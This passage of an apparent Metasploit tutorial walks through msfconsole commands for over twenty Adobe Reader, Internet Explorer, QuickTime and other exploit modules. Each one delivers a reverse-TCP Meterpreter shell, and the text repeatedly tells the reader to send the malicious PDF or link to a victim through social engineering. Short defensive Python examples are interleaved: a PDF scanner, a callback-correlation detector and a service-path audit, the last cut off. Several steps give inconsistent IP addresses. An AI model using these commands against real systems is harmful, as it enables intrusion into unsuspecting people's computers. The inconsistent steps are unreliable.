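The handler is started second but must be running before the PDF reaches anyone: the callback happens the moment Reader opens the file, and a reverse_tcp payload that finds no listener simply exits. `handler_matches` is the check worth keeping even when typing the commands by hand, since a handler with the wrong LPORT produces no error message at all, only silence.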

Attacking a Remote Windows PC using the Adobe Doc.media.newPlayer Use After Free Vulnerability:

This module exploits a use-after-free vulnerability in Adobe Reader and Adobe Acrobat Professional versions up to and including 9.2. It is a browser module: the crafted PDF is served from a web page and opened by the Reader browser plugin, so it is delivered by link rather than as an attachment.

Open a BackTrack terminal, start msfconsole and enter the following commands:

use exploit/windows/browser/adobe_media_newplayer

msf exploit(adobe_media_newplayer) > set payload windows/meterpreter/reverse_tcp
msf exploit(adobe_media_newplayer) > set lhost 192.168.42.131 (IP of the local host)
msf exploit(adobe_media_newplayer) > set srvhost 192.168.42.131 (this must be an address on the local machine)
msf exploit(adobe_media_newplayer) > set uripath ad (the URL path to use for this exploit)
msf exploit(adobe_media_newplayer) > exploit

The URL to give to the victim is http://192.168.42.131:8080/ad

Send the link to the victim via any social engineering technique. When the victim opens the link in their browser, you get access to the victim's PC.

Use "sessions -l" to list the sessions and "sessions -i <number>" to interact with one.


Attacking a Remote Windows PC using the Adobe Reader U3D Memory Corruption Vulnerability:

This module exploits a vulnerability in the U3D handling within versions 9.x through 9.4.6 and 10 through 10.1.1 of Adobe Reader. The vulnerability is due to the use of uninitialized memory. Arbitrary code execution is achieved by embedding specially crafted U3D data into a PDF document. A heap spray via JavaScript is used in order to ensure that the memory used by the invalid pointer issue is controlled.

Open a BackTrack terminal, type msfconsole, then type the commands below:

use exploit/windows/fileformat/adobe_reader_u3d
msf exploit(adobe_reader_u3d) > set payload windows/meterpreter/reverse_tcp
msf exploit(adobe_reader_u3d) > set lhost 192.168.42.131 (IP of the local host)
msf exploit(adobe_reader_u3d) > set filename learning.pdf
msf exploit(adobe_reader_u3d) > exploit

After the malicious PDF file has been generated successfully, it is stored on your local computer at /root/.msf4/local/learning.pdf

Now we need to set up a listener to handle the reverse connection sent by the victim when the exploit executes successfully:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.42.131
exploit


Now send your learning.pdf file to the victim; as soon as they download and open it, you get a meterpreter shell on the victim's computer. Use “sessions -l” and the session number to connect to the session.

Attacking a Remote Windows PC using Adobe PDF Escape EXE Social Engineering:

This module embeds a Metasploit payload into an existing PDF file in a non-standard method. The resulting PDF can be sent to a target as part of a social engineering attack.

Open a BackTrack terminal, type msfconsole, then type the commands below:

use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs
msf exploit(adobe_pdf_embedded_exe_nojs) > set payload windows/meterpreter/reverse_tcp
msf exploit(adobe_pdf_embedded_exe_nojs) > set lhost 192.168.42.131 (IP of the local host)
msf exploit(adobe_pdf_embedded_exe_nojs) > set filename parse.pdf
msf exploit(adobe_pdf_embedded_exe_nojs) > exploit

After the malicious PDF file has been generated successfully, it is stored on your local computer at /root/.msf4/local/parse.pdf

Now we need to set up a listener to handle the reverse connection sent by the victim when the exploit executes successfully:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.42.131
exploit


Attacking a Remote Windows PC using the Adobe Acrobat Bundled LibTIFF Integer Overflow:

This module exploits an integer overflow vulnerability in Adobe Reader and Adobe Acrobat Professional versions 8.0 through 8.2 and 9.0 through 9.3.

Open a BackTrack terminal, type msfconsole, then type the commands below:

use exploit/windows/fileformat/adobe_libtiff
msf exploit(adobe_libtiff) > set payload windows/meterpreter/reverse_tcp
msf exploit(adobe_libtiff) > set lhost 192.168.42.131 (IP of the local host)
msf exploit(adobe_libtiff) > set filename ebook.pdf
msf exploit(adobe_libtiff) > exploit

After the malicious PDF file has been generated successfully, it is stored on your local computer at /root/.msf4/local/ebook.pdf

Now we need to set up a listener (exploit/multi/handler, as in the previous sections) to handle the reverse connection sent by the victim when the exploit executes successfully.


Now send your ebook.pdf file to the victim; as soon as they download and open it, you get a meterpreter shell on the victim's computer. Use “sessions -l” and the session number to connect to the session.

Attacking a Remote Windows PC using the Adobe Collab.collectEmailInfo() Buffer Overflow:

This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional 8.1.1. By creating a specially crafted PDF that contains a malformed Collab.collectEmailInfo() call, an attacker may be able to execute arbitrary code.

Open a BackTrack terminal, type msfconsole, then type the commands below:

use exploit/windows/fileformat/adobe_collectemailinfo
msf exploit(adobe_collectemailinfo) > set payload windows/meterpreter/reverse_tcp
msf exploit(adobe_collectemailinfo) > set lhost 192.168.42.131 (IP of the local host)
msf exploit(adobe_collectemailinfo) > set filename math.pdf
msf exploit(adobe_collectemailinfo) > exploit

After the malicious PDF file has been generated successfully, it is stored on your local computer at /root/.msf4/local/math.pdf

Now we need to set up a listener to handle the reverse connection sent by the victim when the exploit executes successfully:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.42.131
exploit


Now send your math.pdf file to the victim; as soon as they download and open it, you get a meterpreter shell on the victim's computer. Use “sessions -l” and the session number to connect to the session.

Attacking a Remote Windows PC using the Adobe CoolType SING Table “uniqueName” Stack Buffer Overflow:

This module exploits a vulnerability in the Smart INdependent Glyphlets (SING) table handling within versions 8.2.4 and 9.3.4 of Adobe Reader. Prior versions are assumed to be vulnerable as well.

Open a BackTrack terminal, type msfconsole, then type the commands below:

use exploit/windows/browser/adobe_cooltype_sing
msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp
msf exploit(adobe_cooltype_sing) > set lhost 192.168.42.131 (IP of the local host)
msf exploit(adobe_cooltype_sing) > set srvhost 192.168.42.131 (This must be an address on the local machine)
msf exploit(adobe_cooltype_sing) > set uripath fr (The URL path to use for this exploit)
msf exploit(adobe_cooltype_sing) > exploit

The URL to give your victim is http://192.168.42.131:8080/fr

Send the link to the server to the victim via any social engineering technique.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.42.131
exploit


When the victim opens that link in their browser, you get access to the victim's PC.

Use “sessions -l” and the session number to connect to the session.

Attacking a Remote Windows PC using the Adobe JBIG2Decode Heap Corruption Exploit:

This module exploits a heap-based pointer corruption flaw in Adobe Reader 9.0.0 and earlier. This module relies upon JavaScript for the heap spray.

Open a BackTrack terminal, type msfconsole, then type the commands below:

use exploit/windows/browser/adobe_jbig2decode
msf exploit(adobe_jbig2decode) > set lhost 192.168.42.131 (IP of the local host)
msf exploit(adobe_jbig2decode) > set srvhost 192.168.42.131 (This must be an address on the local machine)
msf exploit(adobe_jbig2decode) > set uripath beniimage (The URL path to use for this exploit)
msf exploit(adobe_jbig2decode) > exploit

The URL to give your victim is http://192.168.42.131:8080/beniimage

Send the link to the server to the victim via any social engineering technique.

When the victim opens that link in their browser, you get access to the victim's PC.

Use “sessions -l” and the session number to connect to the session.


Attacking a Remote Windows PC using the Adobe Collab.getIcon() Buffer Overflow:

This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat. Affected versions include < 7.1.1, < 8.1.3, and < 9.1. By creating a specially crafted PDF that contains a malformed Collab.getIcon() call, an attacker may be able to execute arbitrary code.

Open a BackTrack terminal, type msfconsole, then type the commands below:

use exploit/windows/browser/adobe_geticon
msf exploit(adobe_geticon) > set payload windows/meterpreter/reverse_tcp
msf exploit(adobe_geticon) > show options
msf exploit(adobe_geticon) > set lhost 192.168.42.131 (IP of the local host)
msf exploit(adobe_geticon) > set srvhost 192.168.42.131 (This must be an address on the local machine)
msf exploit(adobe_geticon) > set uripath adb (The URL path to use for this exploit)
msf exploit(adobe_geticon) > exploit

The URL to give your victim is http://192.168.42.131:8080/adb

Send the link to the server to the victim via any social engineering technique.

When the victim opens that link in their browser, you get access to the victim's PC.

Use “sessions -l” and the session number to connect to the session.
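The Adobe Reader sections above (util.printf, Doc.media.newPlayer, U3D, the embedded EXE, LibTIFF, Collab.collectEmailInfo, CoolType SING, JBIG2Decode and Collab.getIcon) all deliver a crafted PDF, and most of them rely on an auto-run JavaScript action or an embedded file. The triage scanner below is an added example written for this page, not code from the tutorial or from Metasploit: it inflates FlateDecode streams, undoes PDF name-escape obfuscation (/J#53 is the same name as /JS), and reports the auto-run keys and the exploited API names a defender would look for in a suspicious attachment. The sample PDFs it builds are constructed for the test and carry no exploit, only the call names.

```python
"""PDF attachment triage: added example for this page (not from the tutorial or Metasploit).
Looks for the auto-run keys and the Reader JavaScript calls named in the sections above."""
import re
import zlib

# API calls named in the module descriptions above; they appear literally in the PDF's JavaScript
SUSPICIOUS_JS_CALLS = (b"util.printf", b"Collab.collectEmailInfo", b"Collab.getIcon", b"media.newPlayer")

# PDF dictionary keys that make a document act on its own or carry a file
SUSPICIOUS_KEYS = (b"/JavaScript", b"/JS", b"/OpenAction", b"/AA", b"/EmbeddedFile", b"/Launch")

_NAME_ESCAPE = re.compile(rb"#([0-9A-Fa-f]{2})")
_STREAM = re.compile(rb"(?<!end)stream\r?\n(.*?)\r?\nendstream", re.S)


def normalize_names(data: bytes) -> bytes:
    """Undo PDF name hex escapes (/J#53 -> /JS), a common keyword-scanner evasion."""
    return _NAME_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def inflate_streams(data: bytes) -> bytes:
    """Replace every FlateDecode stream body with its inflated content so that JavaScript
    hidden in a compressed stream is visible to the keyword scan."""
    def _inflate(m):
        try:
            return b"stream\n" + zlib.decompress(m.group(1)) + b"\nendstream"
        except zlib.error:
            return m.group(0)  # uncompressed or truncated stream: keep it as is
    return _STREAM.sub(_inflate, data)


def triage_pdf(data: bytes) -> dict:
    """Return the suspicious keys and API calls found, plus a simple score
    (1 per key, 3 per known-exploited call)."""
    if not data.startswith(b"%PDF"):
        raise ValueError("not a PDF")
    visible = normalize_names(inflate_streams(data))
    keys = [k.decode() for k in SUSPICIOUS_KEYS if k in visible]
    calls = [c.decode() for c in SUSPICIOUS_JS_CALLS if c in visible]
    return {"keys": keys, "js_calls": calls, "score": len(keys) + 3 * len(calls)}


def build_sample(js: bytes, compress: bool = False, obfuscate: bool = False) -> bytes:
    """Constructed minimal PDF whose /OpenAction runs `js`; used only to exercise the scanner."""
    body = zlib.compress(js) if compress else js
    filt = b" /Filter /FlateDecode" if compress else b""
    pdf = (b"%PDF-1.4\n"
           b"1 0 obj << /Type /Catalog /OpenAction 2 0 R >> endobj\n"
           b"2 0 obj << /S /JavaScript /JS 3 0 R >> endobj\n"
           b"3 0 obj << /Length " + str(len(body)).encode() + filt + b" >>\nstream\n"
           + body + b"\nendstream\nendobj\n%%EOF\n")
    if obfuscate:  # hex-escape two names the way evasive samples do
        pdf = pdf.replace(b"/OpenAction", b"/Open#41ction").replace(b"/JS ", b"/J#53 ")
    return pdf


BENIGN_PDF = b"%PDF-1.4\n1 0 obj << /Type /Catalog >> endobj\n%%EOF\n"  # constructed, no actions

if __name__ == "__main__":
    sample = build_sample(b"app.alert(util.printf('%d', 1))", compress=True, obfuscate=True)
    print(triage_pdf(sample))   # the call name is found despite compression and escaping
    print(triage_pdf(BENIGN_PDF))
```

The scoring is deliberately crude: a legitimate form with JavaScript will score a few points, while a document that combines an auto-run action with one of the API calls the modules above abuse scores high enough to quarantine for a closer look. Real PDF exploits also use other filters and object streams, so this keyword pass is a first filter, not a parser.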


Attacking a Remote Windows PC using the Microsoft Internet Explorer execCommand Use-After-Free Vulnerability:

This module exploits a vulnerability found in Microsoft Internet Explorer (MSIE). When rendering an HTML page, the CMshtmlEd object gets deleted in an unexpected manner, but the same memory is reused again later in the CMshtmlEd::Exec() function, leading to a use-after-free condition. Please note that this vulnerability has been exploited in the wild since Sep 14 2012, and there is currently no official patch for it.

Open a BackTrack terminal, type msfconsole, then type the commands below:

use exploit/windows/browser/ie_execcommand_uaf
msf exploit(ie_execcommand_uaf) > set payload windows/meterpreter/reverse_tcp
msf exploit(ie_execcommand_uaf) > set lhost 192.168.42.131 (IP of the local host)
msf exploit(ie_execcommand_uaf) > set srvhost 192.168.42.131 (This must be an address on the local machine)
msf exploit(ie_execcommand_uaf) > set uripath ie (The URL path to use for this exploit)
msf exploit(ie_execcommand_uaf) > exploit

The URL to give your victim is http://192.168.42.131:8080/ie

Send the link to the server to the victim via any social engineering technique.

When the victim opens that link in their browser, you get access to the victim's PC.

Use “sessions -l” and the session number to connect to the session.


Attacking a Remote Windows PC using the Internet Explorer COM CreateObject Code Execution:

This module exploits a generic code execution vulnerability in Internet Explorer by abusing vulnerable ActiveX objects.

Open a BackTrack terminal, type msfconsole, then type the commands below:

use exploit/windows/browser/ie_createobject
msf exploit(ie_createobject) > set payload windows/meterpreter/reverse_tcp
msf exploit(ie_createobject) > set lhost 192.168.42.131 (IP of the local host)
msf exploit(ie_createobject) > set srvhost 192.168.42.131 (This must be an address on the local machine)
msf exploit(ie_createobject) > set uripath ie (The URL path to use for this exploit)
msf exploit(ie_createobject) > exploit

The URL to give your victim is http://192.168.42.131:8080/ie

Send the link to the server to the victim via any social engineering technique.

When the victim opens that link in their browser, you get access to the victim's PC.

Use “sessions -l” and the session number to connect to the session.


Attacking a Remote Windows PC using the Internet Explorer WebViewFolderIcon setSlice() Overflow:

This module exploits a flaw in the WebViewFolderIcon ActiveX control included with Windows 2000, Windows XP, and Windows 2003. This flaw was published during the Month of Browser Bugs project.

Open a BackTrack terminal, type msfconsole, then type the commands below:

use exploit/windows/browser/ms06_057_webview_setslice
msf exploit(ms06_057_webview_setslice) > set payload windows/meterpreter/reverse_tcp
msf exploit(ms06_057_webview_setslice) > set lhost 192.168.42.131 (IP of the local host)
msf exploit(ms06_057_webview_setslice) > set srvhost 192.168.42.131 (This must be an address on the local machine)
msf exploit(ms06_057_webview_setslice) > set uripath ie (The URL path to use for this exploit)
msf exploit(ms06_057_webview_setslice) > exploit

The URL to give your victim is http://192.168.42.131:8080/ie

Send the link to the server to the victim via any social engineering technique.

When the victim opens that link in their browser, you get access to the victim's PC.

Use “sessions -l” and the session number to connect to the session.


Attacking a Remote Windows PC using the Internet Explorer Daxctle.OCX KeyFrame Method Heap Buffer Overflow Vulnerability:

This module exploits a heap overflow vulnerability in the KeyFrame method of the Direct Animation ActiveX control. This is a port of the exploit implemented by Alexander Sotirov.

Open a BackTrack terminal, type msfconsole, then type the commands below:

use exploit/windows/browser/ms06_067_keyframe
msf exploit(ms06_067_keyframe) > set payload windows/meterpreter/reverse_tcp
msf exploit(ms06_067_keyframe) > set lhost 192.168.42.131 (IP of the local host)
msf exploit(ms06_067_keyframe) > set srvhost 192.168.42.131 (This must be an address on the local machine)
msf exploit(ms06_067_keyframe) > set uripath ie (The URL path to use for this exploit)
msf exploit(ms06_067_keyframe) > exploit

The URL to give your victim is http://192.168.42.131:8080/ie

Send the link to the server to the victim via any social engineering technique.

When the victim opens that link in their browser, you get access to the victim's PC.

Use “sessions -l” and the session number to connect to the session.


Attacking a Remote Windows PC using the Internet Explorer createTextRange() Code Execution:

This module exploits a code execution vulnerability in Microsoft Internet Explorer. Both IE6 and IE7 (Beta 2) are vulnerable. It will corrupt memory in a way which, under certain circumstances, can lead to an invalid/corrupt table pointer dereference. EIP will point to a very remote, non-existent memory location. This module is the result of merging three different exploit submissions and has only been reliably tested against Windows XP SP2. This vulnerability was independently discovered by multiple parties. The heap spray method used by this exploit was pioneered by Skylined.

Open a BackTrack terminal, type msfconsole, then type the commands below:

use exploit/windows/browser/ms06_013_createtextrange
msf exploit(ms06_013_createtextrange) > set payload windows/meterpreter/reverse_tcp
msf exploit(ms06_013_createtextrange) > set lhost 192.168.42.131 (IP of the local host)
msf exploit(ms06_013_createtextrange) > set srvhost 192.168.42.131 (This must be an address on the local machine)
msf exploit(ms06_013_createtextrange) > set uripath ie (The URL path to use for this exploit)
msf exploit(ms06_013_createtextrange) > exploit

The URL to give your victim is http://192.168.42.131:8080/ie

Send the link to the server to the victim via any social engineering technique.

When the victim opens that link in their browser, you get access to the victim's PC.

Use “sessions -l” and the session number to connect to the session.


Attacking a Remote Windows PC using the MS11_003 Internet Explorer Exploit:

This module exploits a memory corruption vulnerability within Microsoft’s HTML engine (mshtml). When parsing an HTML page containing a recursive CSS import, a C++ object is deleted and later reused. This leads to arbitrary code execution. This exploit utilizes a combination of heap spraying and the .NET 2.0 ‘mscorie.dll’ module to bypass DEP and ASLR. This module does not opt in to ASLR. As such, this module should be reliable on all Windows versions with .NET 2.0.50727 installed.

Open a BackTrack terminal, type msfconsole, then type the commands below:

use exploit/windows/browser/ms11_003_ie_css_import
msf exploit(ms11_003_ie_css_import) > set payload windows/meterpreter/reverse_tcp
msf exploit(ms11_003_ie_css_import) > set srvhost 192.168.42.131 (This must be an address on the local machine)
msf exploit(ms11_003_ie_css_import) > set srvport 80 (The local port to listen on; default: 8080)
msf exploit(ms11_003_ie_css_import) > set uripath hack.flv (The URL path to use for this exploit)
msf exploit(ms11_003_ie_css_import) > set lhost 192.168.1.4 (IP of the local host)
msf exploit(ms11_003_ie_css_import) > exploit

The URL to give your victim is http://192.168.42.131:80/hack.flv

Send the link to the server to the victim via any social engineering technique.

When the victim opens that link in their browser, you get access to the victim's PC.

Use “sessions -l” and the session number to connect to the session.


Attacking a Remote Windows PC in a LAN using Internet Explorer DHTML Behaviors:

This module exploits a use-after-free vulnerability within the DHTML behaviors functionality of Microsoft Internet Explorer versions 6 and 7. This bug was discovered being used in the wild and was previously known as the “iepeers” vulnerability. The name comes from Microsoft’s suggested workaround to block access to the iepeers.dll file. According to Nico Waisman, “The bug itself is when trying to persist an object using the setAttribute, which end up calling VariantChangeTypeEx with both the source and the destination being the same variant. So if you send as a variant an IDISPATCH the algorithm will try to do a VariantClear of the destination before using it. This will end up on a call to PlainRelease which deref the reference and clean the object.” NOTE: Internet Explorer 8 and Internet Explorer 5 are not affected.

Open a BackTrack terminal, type msfconsole, then type the commands below:

use exploit/windows/browser/ms10_018_ie_behaviors
msf exploit(ms10_018_ie_behaviors) > set payload windows/meterpreter/reverse_tcp
msf exploit(ms10_018_ie_behaviors) > set lhost 192.168.42.31 (IP of the local host)
msf exploit(ms10_018_ie_behaviors) > set srvhost 192.168.42.31 (This must be an address on the local machine)
msf exploit(ms10_018_ie_behaviors) > set uripath ie (The URL path to use for this exploit)
msf exploit(ms10_018_ie_behaviors) > exploit

The URL to give your victim is http://192.168.42.131:80/ie

Send the link to the server to the victim via any social engineering technique.

When the victim opens that link in their browser, you get access to the victim's PC.

Use “sessions -l” and the session number to connect to the session.


Attacking a Remote Windows XP PC using the Internet Explorer Winhlp32.exe MsgBox Code Execution:

This module exploits a code execution vulnerability that occurs when a user presses F1 on a Message Box originated from VBScript within a web page. When the user hits F1, the Message Box help functionality will attempt to load and use a HLP file from an SMB or WebDAV (if the WebDAV redirector is enabled) server. This particular version of the exploit implements a WebDAV server that will serve the HLP file as well as a payload EXE. During testing, warnings about the payload EXE being unsigned were witnessed. A future version of this module might use other methods that do not create such a warning.

Open a BackTrack terminal, type msfconsole, then type the commands below:

use exploit/windows/browser/ms10_022_ie_vbscript_winhlp32
msf exploit(ms10_022_ie_vbscript_winhlp32) > set payload windows/meterpreter/reverse_tcp
msf exploit(ms10_022_ie_vbscript_winhlp32) > set lhost 192.168.42.31 (IP of the local host)
msf exploit(ms10_022_ie_vbscript_winhlp32) > set srvhost 192.168.42.31 (This must be an address on the local machine)
msf exploit(ms10_022_ie_vbscript_winhlp32) > set uripath / (The URL path to use for this exploit)
msf exploit(ms10_022_ie_vbscript_winhlp32) > exploit

The URL to give your victim is http://192.168.42.131

Send the link to the server to the victim via any social engineering technique.

When the victim opens that link in their browser, you get access to the victim's PC.

Use “sessions -l” and the session number to connect to the session.


Attacking a Remote Windows PC using the Internet Explorer CSS SetUserClip Memory Corruption Exploit:

This module exploits a memory corruption vulnerability within Microsoft’s HTML engine (mshtml). When parsing an HTML page containing a specially crafted CSS tag, memory corruption occurs that can lead to arbitrary code execution. It seems like Microsoft code inadvertently increments a vtable pointer to point to an unaligned address within the vtable’s function pointers. This leads to the program counter being set to the address determined by the address “*vtable+0x30+1”. The particular address depends on the exact version of the mshtml library in use. Since the address depends on the version of mshtml, some versions may not be exploitable. Specifically, those ending up with a program counter value within another module, in kernel space, or just not able to be reached with various memory spraying techniques. Also, since the address is not controllable, it is unlikely to be possible to use ROP to bypass non-executable memory protections.

Open a BackTrack terminal, type msfconsole, then type the commands below:

use exploit/windows/browser/ms10_090_ie_css_clip
msf exploit(ms10_090_ie_css_clip) > set payload windows/meterpreter/reverse_tcp
msf exploit(ms10_090_ie_css_clip) > set lhost 192.168.42.31 (IP of the local host)
msf exploit(ms10_090_ie_css_clip) > set srvhost 192.168.42.31 (This must be an address on the local machine)
msf exploit(ms10_090_ie_css_clip) > set uripath clips (The URL path to use for this exploit)
msf exploit(ms10_090_ie_css_clip) > exploit

The URL to give your victim is http://192.168.42.131:8080/clips

Send the link to the server to the victim via any social engineering technique.

When the victim opens that link in their browser, you get access to the victim's PC.

Use “sessions -l” and the session number to connect to the session.


Attacking a Remote Windows PC using the Internet Explorer 7 CFunctionPointer Uninitialized Memory Corruption:

This module exploits an error related to the CFunctionPointer function when attempting to access uninitialized memory. A remote attacker could exploit this vulnerability to corrupt memory and execute arbitrary code on the system with the privileges of the victim.

Open a BackTrack terminal, type msfconsole, then type the commands below:

use exploit/windows/browser/ms09_002_memory_corruption
msf exploit(ms09_002_memory_corruption) > set payload windows/meterpreter/reverse_tcp
msf exploit(ms09_002_memory_corruption) > set lhost 192.168.42.131 (IP of the local host)
msf exploit(ms09_002_memory_corruption) > set srvhost 192.168.42.131 (This must be an address on the local machine)
msf exploit(ms09_002_memory_corruption) > set uripath ie (The URL path to use for this exploit)
msf exploit(ms09_002_memory_corruption) > exploit

The URL to give your victim is http://192.168.42.131:80/ie

Send the link to the server to the victim via any social engineering technique.

When the victim opens that link in their browser, you get access to the victim's PC.

Use “sessions -l” and the session number to connect to the session.


Attacking a Remote Windows PC using the Apple QuickTime 7.7.2 TeXML Style Element font-table Field Stack Buffer Overflow:

This module exploits a vulnerability found in Apple QuickTime. When handling a TeXML file, it is possible to trigger a stack-based buffer overflow, and then gain arbitrary code execution under the context of the user. This is due to the QuickTime3GPP.gtx component not handling certain Style subfields properly, such as the font-table field, which is used to trigger the overflow in this module. Because of QuickTime restrictions when handling font-table fields, only 0x31-0x39 bytes can be used to overflow, so at the moment a DEP/ASLR bypass hasn’t been provided. The module has been tested successfully on IE6 and IE7 browsers (Windows XP and Vista).

Open a BackTrack terminal, type msfconsole, then type the commands below:

use exploit/windows/browser/apple_quicktime_texml_font_table
msf exploit(apple_quicktime_texml_font_table) > set payload windows/meterpreter/reverse_tcp
msf exploit(apple_quicktime_texml_font_table) > set lhost 192.168.42.131 (IP of the local host)
msf exploit(apple_quicktime_texml_font_table) > set srvhost 192.168.42.131 (This must be an address on the local machine)
msf exploit(apple_quicktime_texml_font_table) > set uripath / (The URL path to use for this exploit)
msf exploit(apple_quicktime_texml_font_table) > exploit

The URL to give your victim is http://192.168.42.131:8080/

Send the link to the server to the victim via any social engineering technique.

When the victim opens that link in their browser, you get access to the victim's PC.

Use “sessions -l” and the session number to connect to the session.
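Every browser module above (the Adobe, Internet Explorer and QuickTime ones) follows one pattern: the victim fetches http://SRVHOST:SRVPORT/URIPATH, and the windows/meterpreter/reverse_tcp payload then connects back from the victim to LHOST. The detection below is an added example for this page, not code from the tutorial or from Metasploit: it correlates a proxy log with a firewall log and flags a client that opens a fresh non-web outbound connection to the same host it fetched a page from moments earlier. The log formats, addresses and the callback port 4443 (the lport value this tutorial uses later) are constructed for the demonstration.

```python
"""Drive-by-then-callback correlation: added detection example for this page.
Both logs below are constructed for the demonstration."""
from datetime import datetime
from urllib.parse import urlsplit

# Constructed proxy log: timestamp client method url status
PROXY_LOG = """\
2012-09-20T10:00:01 10.0.0.7 GET http://192.168.42.131:8080/ie 200
2012-09-20T10:00:02 10.0.0.9 GET http://intranet.example/wiki 200
2012-09-20T10:05:00 10.0.0.9 GET http://192.168.42.131:8080/clips 200
"""

# Constructed firewall log: timestamp src dst dport action
FW_LOG = """\
2012-09-20T10:00:03 10.0.0.7 192.168.42.131 4443 ALLOW
2012-09-20T10:00:30 10.0.0.9 192.168.42.131 443 ALLOW
2012-09-20T10:30:00 10.0.0.9 192.168.42.131 4443 ALLOW
"""

WEB_PORTS = {80, 443, 8080}   # ordinary browsing; anything else counts as "non-web"


def parse_proxy(text):
    """Return a list of (time, client, url, server_host) from the proxy log."""
    rows = []
    for line in text.splitlines():
        ts, client, _method, url, _status = line.split()
        rows.append((datetime.fromisoformat(ts), client, url, urlsplit(url).hostname))
    return rows


def parse_fw(text):
    """Return a list of (time, src, dst, dport) for connections the firewall allowed."""
    rows = []
    for line in text.splitlines():
        ts, src, dst, dport, action = line.split()
        if action == "ALLOW":
            rows.append((datetime.fromisoformat(ts), src, dst, int(dport)))
    return rows


def correlate(proxy_text, fw_text, window_seconds=60):
    """Return (client, url, dport, seconds_after_fetch) for every non-web outbound connection
    a client opened to a host within `window_seconds` after fetching a page from that host.
    Matching on the same host is the conservative form of the rule: in the sections above
    SRVHOST and LHOST are the same address, which is not guaranteed in general."""
    fetches = parse_proxy(proxy_text)
    alerts = []
    for ts, src, dst, dport in parse_fw(fw_text):
        if dport in WEB_PORTS:
            continue
        for fts, client, url, host in fetches:
            delta = (ts - fts).total_seconds()
            if client == src and host == dst and 0 <= delta <= window_seconds:
                alerts.append((src, url, dport, int(delta)))
                break
    return alerts


if __name__ == "__main__":
    for client, url, dport, secs in correlate(PROXY_LOG, FW_LOG):
        print(f"ALERT {client} fetched {url} then connected to port {dport} {secs}s later")
```

With the constructed logs only 10.0.0.7 is flagged: it fetched /ie and two seconds later opened a connection to port 4443 on the same server. The 10.0.0.9 connection to port 4443 comes 25 minutes after its fetch and falls outside the window, and its port 443 connection is ordinary browsing. A looser variant that drops the same-host condition catches callbacks to a separate LHOST at the cost of more false positives.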


Attacking a Remote Windows PC using the gAlan 0.2.1 Buffer Overflow:

This module exploits a stack buffer overflow in gAlan 0.2.1 by creating a specially crafted galan file.

Open a BackTrack terminal, type msfconsole, then type the commands below:

use exploit/windows/fileformat/galan_fileformat_bof
msf exploit(galan_fileformat_bof) > set payload windows/meterpreter/reverse_tcp
msf exploit(galan_fileformat_bof) > set lhost 192.168.42.131 (IP of the local host)
msf exploit(galan_fileformat_bof) > exploit

After the malicious galan file has been generated successfully, it is stored on your local computer at /root/.msf4/local/msf.galan

Now we need to set up a listener to handle the reverse connection sent by the victim when the exploit executes successfully:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.42.131
exploit

Now send your msf.galan file to the victim; as soon as they download and open it, you get a meterpreter shell on the victim's computer.


Attacking a Remote Windows PC using the Orbit Downloader URL Unicode Conversion Overflow:

This module exploits a stack-based buffer overflow in Orbit Downloader. The vulnerability is due to Orbit converting a URL ASCII string to Unicode in an insecure way with MultiByteToWideChar. The vulnerability is exploited with a specially crafted metalink file that should be opened with Orbit through the “File->Add Metalink…” option.

Open a BackTrack terminal, type msfconsole, then type the commands below:

use exploit/windows/fileformat/orbit_download_failed_bof
msf exploit(orbit_download_failed_bof) > set payload windows/meterpreter/reverse_tcp
msf exploit(orbit_download_failed_bof) > set lhost 192.168.1.4 (IP of the local host)
msf exploit(orbit_download_failed_bof) > exploit

After the malicious metalink file has been generated successfully, it is stored on your local computer at /root/.msf4/local/msf.metalink

Now we need to set up a listener to handle the reverse connection sent by the victim when the exploit executes successfully:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.42.131
exploit

Now send your msf.metalink file to the victim; as soon as they download and open it, you get a meterpreter shell on the victim's computer.


Attacking a Remote Windows PC using the OpenVPN Trusted Path Privilege Escalation:

This module exploits a logic flaw due to how the lpApplicationName parameter is handled. When the lpApplicationName contains a space, the file name is ambiguous. Take this file path as an example: C:\program files\hello.exe. The Windows API will try to interpret this as two possible paths, C:\program.exe and C:\program files\hello.exe, and then execute all of them. To some software developers this is unexpected behavior, which becomes a security problem if an attacker is able to place a malicious executable in one of these unexpected paths, sometimes escalating privileges if run as SYSTEM. Some software, such as OpenVPN 2.1.1, OpenSSH Server 5, and others, has the same problem. The offensive technique is also described in Writing Secure Code (2nd Edition), Chapter 23, in the section “Calling Processes Security” on page 676.

Open a BackTrack terminal, type msfconsole, then type the commands below:

use exploit/windows/local/trusted_service_path
msf exploit(trusted_service_path) > set payload windows/meterpreter/reverse_tcp
msf exploit(trusted_service_path) > set lhost 192.168.42.131 (IP of the local host)
msf exploit(trusted_service_path) > set lport 4443 (Port of the local machine)
msf exploit(trusted_service_path) > set session 1
msf exploit(trusted_service_path) > exploit

The URL to give your victim is http://192.168.42.131

Send the link to the server to the victim via any social engineering technique.

When the victim opens that link in their browser, you get access to the victim's PC.

Use “sessions -l” and the session number to connect to the session.
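The ambiguity described above (an unquoted service path with spaces, so that C:\program files\hello.exe is also tried as C:\program.exe) can be audited and fixed without Metasploit. The helper below is an added example for this page, not code from the tutorial or from the trusted_service_path module: it enumerates the paths CreateProcess would try for a given ImagePath, flags services whose path is unquoted and contains spaces, and produces the quoted form that removes the ambiguity. The service entries are constructed; on a real host you would feed it the ImagePath values read from the services registry keys.

```python
"""Unquoted service path audit: added example for this page (not from the tutorial or from
the trusted_service_path module). Service entries below are constructed."""
import ntpath

# Constructed ImagePath values of the kind found under HKLM\SYSTEM\CurrentControlSet\Services\<name>
SAMPLE_SERVICES = {
    "vpnsvc": r"C:\Program Files\Example VPN\bin\vpnsvc.exe --service",
    "goodsvc": r'"C:\Program Files\Good Vendor\good.exe" --service',
    "spooler": r"C:\Windows\System32\spoolsv.exe",
}


def candidate_paths(image_path: str) -> list:
    """Paths CreateProcess tries, in order, for an unquoted command line containing spaces:
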